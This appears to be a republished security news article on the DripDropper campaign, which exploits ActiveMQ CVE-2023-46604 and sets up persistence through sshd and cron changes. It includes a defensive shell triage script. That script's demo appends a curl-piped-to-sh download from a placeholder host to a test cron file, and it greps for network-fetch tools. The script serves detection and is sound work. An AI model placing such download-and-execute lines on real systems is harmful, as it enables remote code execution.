DripDropper Malware Hits Linux Clouds via Two-Year-Old ActiveMQ Vulnerability

Two-Year-Old Vulnerability

Threat actors are actively exploiting a nearly two-year-old security flaw in Apache ActiveMQ to gain persistent access to cloud Linux systems and deploy malware known as DripDropper.

In an unusual twist, the as-yet-unidentified attackers patch the exploited vulnerability once they have secured initial access. The step locks other adversaries out of the same hole and helps hide the original entry point, according to a Red Canary report shared with The Hacker News.

“Follow-on adversary command-and-control (C2) tools varied by endpoint and included Sliver and Cloudflare Tunnels, which help maintain covert command and control over the long term,” researchers Christina Johns, Chris Brook, and Tyler Edmonds stated.

The attacks exploit a maximum-severity flaw in Apache ActiveMQ (CVE-2023-46604, CVSS score: 10.0). The bug is an unsafe deserialization issue in the broker's OpenWire protocol handler that lets an unauthenticated remote attacker instantiate arbitrary classes and run shell commands on the host. Apache addressed it in late October 2023 with the 5.15.16, 5.16.7, 5.17.6 and 5.18.3 releases.

Since then, the security defect has come under heavy exploitation, with multiple threat actors leveraging it to deploy a wide range of payloads, including HelloKitty ransomware, Linux rootkits, GoTitan botnet malware, and Godzilla web shell.

DripDropper

In the activity Red Canary observed, the threat actors used their foothold to modify the existing sshd configuration so that root login is permitted, giving them a second, privileged way onto the host. They then dropped a previously undocumented downloader dubbed DripDropper.

DripDropper, a PyInstaller Executable and Linkable Format (ELF) binary, requires a password to run, thereby resisting analysis. Additionally, it communicates with an attacker-controlled Dropbox account, illustrating how threat actors increasingly rely on legitimate services to blend in with regular network activity and sidestep detection.

The downloader ultimately delivers two files. The first performs a set of actions that varies by endpoint, ranging from process monitoring to contacting Dropbox for further instructions, and persists by modifying the 0anacron file in the /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly and /etc/cron.monthly directories.

The second file also contacts Dropbox for commands and alters existing SSH configuration files, most likely as a backup mechanism for persistent access. In the final stage the attackers download the patched ActiveMQ artifacts for CVE-2023-46604 from Apache Maven and install them, closing the hole they came in through.
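The three host-side traces described above (sshd configured to permit root login, 0anacron stubs modified for persistence, and the broker patched after the fact) can be checked with ordinary shell tools. The following POSIX shell script is an added example, not Red Canary's or Apache's code: it computes the effective PermitRootLogin value the way sshd reads it (the first occurrence wins), compares cron stubs against a recorded sha256 baseline, greps them for download-and-execute lines, and classifies an ActiveMQ version string against the fixed releases named in the Apache advisory. The baseline file format, the stub paths, and the sample files it builds under mktemp are assumptions and constructed input, not real evidence.

```shell
#!/bin/sh
# Triage checks for the three DripDropper traces described above: sshd root
# login re-enabled, 0anacron cron stubs tampered with, and the ActiveMQ
# version state. Added example, not Red Canary's or Apache's code. The
# baseline file format and the stub paths are assumptions; adapt them.

# Effective PermitRootLogin for an sshd_config. sshd keeps the FIRST value it
# reads for a keyword, so an appended "PermitRootLogin yes" only takes effect
# when every earlier occurrence is commented out, which is the usual distro
# default. Compiled-in default since OpenSSH 7.0 is prohibit-password.
# Include and Match are not expanded here; on a live host `sshd -T` is the
# authoritative answer and this is a quick offline/forensic approximation.
effective_permit_root_login() {
  awk '
    /^[[:space:]]*(#|$)/ { next }                # comment or blank line
    { gsub(/[[:space:]]*=[[:space:]]*/, " ") }   # accept "Keyword=value" form
    tolower($1) == "match" { exit }              # values after Match are conditional
    tolower($1) == "permitrootlogin" { print tolower($2); found = 1; exit }
    END { if (!found) print "prohibit-password" }
  ' "$1"
}

# Compare cron stubs against a baseline of "sha256  path" lines recorded from a
# known-good host (sha256sum output format). Paths with spaces are not handled.
# Prints one of OK / MODIFIED / MISSING / UNLISTED per file.
check_cron_stubs() {
  baseline=$1; shift
  for f in "$@"; do
    expected=$(awk -v p="$f" '$2 == p { print $1 }' "$baseline")
    if [ ! -f "$f" ]; then echo "MISSING $f"
    elif [ -z "$expected" ]; then echo "UNLISTED $f"
    elif [ "$(sha256sum < "$f" | cut -d' ' -f1)" = "$expected" ]; then echo "OK $f"
    else echo "MODIFIED $f"
    fi
  done
}

# Lines in a cron script that fetch, decode or reach out; a triage aid, not proof.
flag_fetch_lines() {
  grep -nE 'curl|wget|base64|python|dropbox|/dev/tcp' "$1" || true
}

# CVE-2023-46604 state for an ActiveMQ version string. Fixed releases per the
# Apache advisory: 5.15.16, 5.16.7, 5.17.6, 5.18.3; everything older on those
# branches, and every release before 5.15.16, is vulnerable. 5.19+ and 6.x
# shipped after the fix. Prints "vulnerable" or "fixed".
activemq_cve_2023_46604_state() {
  set -- $(printf '%s' "$1" | tr '.' ' ')
  major=$1; minor=${2:-0}; patch=${3:-0}; patch=${patch%%[!0-9]*}; patch=${patch:-0}
  if [ "$major" -gt 5 ]; then echo fixed; return; fi
  if [ "$major" -lt 5 ]; then echo vulnerable; return; fi
  case "$minor" in
    15) min=16 ;; 16) min=7 ;; 17) min=6 ;; 18) min=3 ;;
    *) if [ "$minor" -lt 15 ]; then echo vulnerable; else echo fixed; fi; return ;;
  esac
  if [ "$patch" -ge "$min" ]; then echo fixed; else echo vulnerable; fi
}

# Demonstration on constructed files (constructed input, not real evidence).
tmp=$(mktemp -d)
printf '#PermitRootLogin prohibit-password\nPasswordAuthentication yes\nPermitRootLogin yes\n' \
  > "$tmp/sshd_config"
echo "PermitRootLogin -> $(effective_permit_root_login "$tmp/sshd_config")"   # yes

printf '#!/bin/sh\n[ -x /usr/sbin/anacron ] && exec /usr/sbin/anacron -s\n' > "$tmp/0anacron.daily"
cp "$tmp/0anacron.daily" "$tmp/0anacron.weekly"
sha256sum "$tmp/0anacron.daily" "$tmp/0anacron.weekly" > "$tmp/baseline"   # known-good baseline
printf 'curl -fsSL https://example.invalid/update | sh\n' >> "$tmp/0anacron.weekly"  # simulated tamper
check_cron_stubs "$tmp/baseline" "$tmp/0anacron.daily" "$tmp/0anacron.weekly" "$tmp/0anacron.hourly"
flag_fetch_lines "$tmp/0anacron.weekly"

for v in 5.15.15 5.15.16 5.18.2 5.18.3 6.0.0; do
  echo "ActiveMQ $v: $(activemq_cve_2023_46604_state "$v")"
done
rm -rf "$tmp"
```

A `fixed` verdict is exactly the article's point: it says nothing about whether the broker was exploited before the patch landed. If the patched JARs appeared outside your own change window, treat the version check as a lead rather than a clearance and run the sshd and cron checks anyway. On a live system, `sshd -T` and `rpm -Vf` or `dpkg -V` are the authoritative equivalents of the approximations above.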

“Patching the vulnerability does not disrupt their operations, as they have already established other persistence mechanisms for continued access,” the researchers noted.

While rare, the technique is not new. Last month, France's national cybersecurity agency ANSSI detailed a China-nexus initial access broker using the same approach to secure access to systems. Patching behind themselves keeps other threat actors from exploiting the same vulnerabilities and masks the initial access vector used in the first place.

This campaign is a timely reminder to apply patches promptly, limit exposure of internal services by configuring ingress rules to trusted IP addresses or VPNs, and monitor cloud logging to flag anomalous activity. It also shows why a broker that now reports a fixed version cannot be assumed clean: if the patch was not applied through your own change process, treat the host as potentially compromised and look for the persistence described above.

 


Source: TheHackerNews

Read more at Impreza News
